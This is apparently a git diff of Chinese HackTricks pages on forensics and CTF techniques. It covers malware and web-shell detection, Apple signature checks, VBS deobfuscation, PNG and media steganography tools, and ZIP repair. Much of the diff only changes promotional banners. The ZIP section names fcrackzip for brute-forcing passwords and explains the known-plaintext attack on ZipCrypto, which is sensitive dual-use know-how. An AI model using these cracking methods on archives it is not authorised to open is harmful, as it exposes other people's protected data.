[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) 尽最大努力检测**混淆**/**可疑代码**以及使用**经常用于**恶意软件**/Web shell 的**PHP**函数的文件。
|
||||
|
||||
### Apple 二进制签名
|
||||
|
||||
在检查一些恶意软件样本时,您应始终检查二进制文件的签名,因为签署它的开发人员可能已与恶意软件相关联。
|
||||
在检查一些**恶意软件样本**时,您应始终**检查二进制签名**,因为签署它的**开发人员**可能已与**恶意软件**有关。
|
||||
```bash
|
||||
#Get signer
|
||||
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
|
||||
|
@ -153,7 +154,7 @@ spctl --assess --verbose /Applications/Safari.app
|
|||
|
||||
### 文件堆叠
|
||||
|
||||
如果你知道某个包含**web服务器文件**的文件夹是在**某个日期**上次更新的。**检查**所有**web服务器文件**的创建和修改日期,如果有任何**可疑日期**,则检查该文件。
|
||||
如果你知道某个包含**web服务器文件**的文件夹是在**某个日期**上次更新的。**检查**一下**web服务器中所有文件**的创建和修改日期,如果有任何**可疑日期**,就检查那个文件。
|
||||
|
||||
### 基线
|
||||
|
||||
|
@ -161,4 +162,19 @@ spctl --assess --verbose /Applications/Safari.app
|
|||
|
||||
### 统计分析
|
||||
|
||||
当信息保存在日志中时,你可以**检查统计数据,比如每个web服务器文件被访问的次数,因为web shell可能是其中之一**。
|
||||
当信息保存在日志中时,你可以**检查统计数据,比如web服务器的每个文件被访问的次数,因为其中可能包含web shell**。
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注我们。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们**。
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
在这里,您可以找到特定文件类型和/或软件的有趣技巧:
|
||||
|
@ -37,16 +38,17 @@
|
|||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在Twitter上** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** 上关注我们。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们**。
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,19 +1,20 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
一些有助于调试/反混淆恶意VBS文件的方法:
|
||||
一些有用的内容,可用于调试/反混淆恶意 VBS 文件:
|
||||
|
||||
## echo
|
||||
```bash
|
||||
|
@ -52,16 +53,17 @@ End With
|
|||
|
||||
End Function
|
||||
```
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索我们的独家[**NFTs**]收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,33 +1,20 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
|
||||
</details>
|
||||
|
||||
**PNG文件**在**CTF挑战**中备受推崇,因为它们具有**无损压缩**,非常适合嵌入隐藏数据。像**Wireshark**这样的工具通过解剖网络数据包中的PNG文件数据,可以分析PNG文件,揭示嵌入的信息或异常。
|
||||
|
||||
为了检查PNG文件的完整性并修复损坏,**pngcheck**是一个关键工具,提供命令行功能来验证和诊断PNG文件([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html))。当文件超出简单修复范围时,像[OfficeRecovery的PixRecovery](https://online.officerecovery.com/pixrecovery/)这样的在线服务提供了一个基于Web的解决方案,用于**修复损坏的PNG文件**,帮助CTF参与者恢复关键数据。
|
||||
|
||||
这些策略强调了在CTF中采用综合方法的重要性,利用分析工具和修复技术的结合来揭示和恢复隐藏或丢失的数据。
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**PNG 文件** 在 **CTF 挑战** 中备受推崇,因为它们具有**无损压缩**,非常适合嵌入隐藏数据。像 **Wireshark** 这样的工具通过解剖网络数据包中的 PNG 文件数据,可以分析 PNG 文件,揭示嵌入的信息或异常。
|
||||
|
||||
为了检查 PNG 文件的完整性并修复损坏,**pngcheck** 是一个关键工具,提供命令行功能来验证和诊断 PNG 文件 ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html))。当文件超出简单修复范围时,像 [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) 这样的在线服务提供了一个基于 Web 的解决方案,用于**修复损坏的 PNG 文件**,帮助 CTF 参与者恢复关键数据。
|
||||
|
||||
这些策略强调了在 CTF 中采用综合方法的重要性,利用分析工具和修复技术的结合来揭示和恢复隐藏或丢失的数据。
|
||||
|
|
|
@ -1,41 +1,42 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**音频和视频文件处理**是CTF取证挑战中的基本技术,利用**隐写术**和元数据分析来隐藏或揭示秘密消息。工具如**[mediainfo](https://mediaarea.net/en/MediaInfo)**和**`exiftool`**对检查文件元数据和识别内容类型至关重要。
|
||||
**音频和视频文件处理** 是 **CTF 取证挑战** 中的基本技术,利用 **隐写术** 和元数据分析来隐藏或揭示秘密信息。工具如 **[mediainfo](https://mediaarea.net/en/MediaInfo)** 和 **`exiftool`** 对检查文件元数据和识别内容类型至关重要。
|
||||
|
||||
对于音频挑战,**[Audacity](http://www.audacityteam.org/)**是一个优秀的工具,可用于查看波形和分析频谱图,有助于揭示音频中编码的文本。**[Sonic Visualiser](http://www.sonicvisualiser.org/)**强烈推荐用于详细的频谱图分析。**Audacity**允许对音频进行操作,如减慢或倒放音轨以检测隐藏的消息。**[Sox](http://sox.sourceforge.net/)**是一个命令行实用程序,擅长转换和编辑音频文件。
|
||||
对于音频挑战,**[Audacity](http://www.audacityteam.org/)** 是一个优秀的工具,可用于查看波形和分析频谱图,有助于揭示音频中编码的文本。**[Sonic Visualiser](http://www.sonicvisualiser.org/)** 强烈推荐用于详细的频谱图分析。**Audacity** 允许对音频进行操作,如减慢或倒放音轨以检测隐藏的消息。**[Sox](http://sox.sourceforge.net/)**,一个命令行实用程序,擅长转换和编辑音频文件。
|
||||
|
||||
**最低有效位(LSB)**操作是音频和视频隐写术中常见的技术,利用媒体文件的固定大小块来隐匿地嵌入数据。**[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)**对解码隐藏为**DTMF音调**或**莫尔斯电码**的消息很有用。
|
||||
**最低有效位(LSB)** 操作是音频和视频隐写术中常见的技术,利用媒体文件的固定大小块来隐匿地嵌入数据。**[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** 用于解码隐藏为 **DTMF 信号** 或 **莫尔斯电码** 的消息。
|
||||
|
||||
视频挑战通常涉及捆绑音频和视频流的容器格式。**[FFmpeg](http://ffmpeg.org/)**是分析和处理这些格式的首选工具,能够解复用和回放内容。对于开发人员,**[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)**将FFmpeg的功能集成到Python中,实现高级可脚本化交互。
|
||||
视频挑战通常涉及捆绑音频和视频流的容器格式。**[FFmpeg](http://ffmpeg.org/)** 是分析和处理这些格式的首选工具,能够解复用和回放内容。对于开发人员,**[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** 将 FFmpeg 的功能集成到 Python 中,实现高级可脚本化交互。
|
||||
|
||||
这些工具的组合突显了CTF挑战中所需的多功能性,参与者必须运用广泛的分析和处理技术来揭示音频和视频文件中的隐藏数据。
|
||||
这些工具的组合突显了在 CTF 挑战中所需的多样性,参与者必须运用广泛的分析和处理技术来揭示音频和视频文件中隐藏的数据。
|
||||
|
||||
# 参考资料
|
||||
## 参考资料
|
||||
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,30 +1,46 @@
|
|||
# ZIP技巧
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们**.
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
用于管理**zip文件**的**命令行工具**对于诊断、修复和破解zip文件至关重要。以下是一些关键的实用工具:
|
||||
用于管理**zip文件**的**命令行工具**对于诊断、修复和破解zip文件至关重要。以下是一些关键的实用程序:
|
||||
|
||||
- **`unzip`**:显示zip文件无法解压缩的原因。
|
||||
- **`zipdetails -v`**:提供zip文件格式字段的详细分析。
|
||||
- **`zipinfo`**:列出zip文件的内容而不解压缩它们。
|
||||
- **`zip -F input.zip --out output.zip`** 和 **`zip -FF input.zip --out output.zip`**:尝试修复损坏的zip文件。
|
||||
- **[fcrackzip](https://github.com/hyc/fcrackzip)**:用于暴力破解zip密码的工具,对长达约7个字符的密码有效。
|
||||
- **[fcrackzip](https://github.com/hyc/fcrackzip)**:用于暴力破解zip密码的工具,对长度约为7个字符的密码非常有效。
|
||||
|
||||
[Zip文件格式规范](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)提供了关于zip文件的结构和标准的详细信息。
|
||||
[Zip文件格式规范](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)提供了关于zip文件的结构和标准的全面细节。
|
||||
|
||||
值得注意的是,受密码保护的zip文件**不会加密**其中的文件名或文件大小,这是与RAR或7z文件不同的安全漏洞,后者会加密这些信息。此外,使用旧的ZipCrypto方法加密的zip文件如果存在未加密的压缩文件副本,则容易受到**明文攻击**的影响。这种攻击利用已知内容来破解zip文件的密码,这一漏洞在[HackThis的文章](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files)中有详细说明,并在[这篇学术论文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf)中进一步解释。然而,使用**AES-256**加密的zip文件不受这种明文攻击的影响,突显了为敏感数据选择安全加密方法的重要性。
|
||||
值得注意的是,受密码保护的zip文件**不会加密**其中的文件名或文件大小,这是与RAR或7z文件不同的安全漏洞,后者会加密这些信息。此外,使用较旧的ZipCrypto方法加密的zip文件如果存在未加密的压缩文件副本,则容易受到**明文攻击**。这种攻击利用已知内容来破解zip的密码,这一漏洞在[HackThis的文章](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files)中有详细说明,并在[这篇学术论文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf)中进一步解释。然而,使用**AES-256**加密的zip文件免疫于这种明文攻击,突显了为敏感数据选择安全加密方法的重要性。
|
||||
|
||||
# 参考资料
|
||||
## 参考资料
|
||||
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
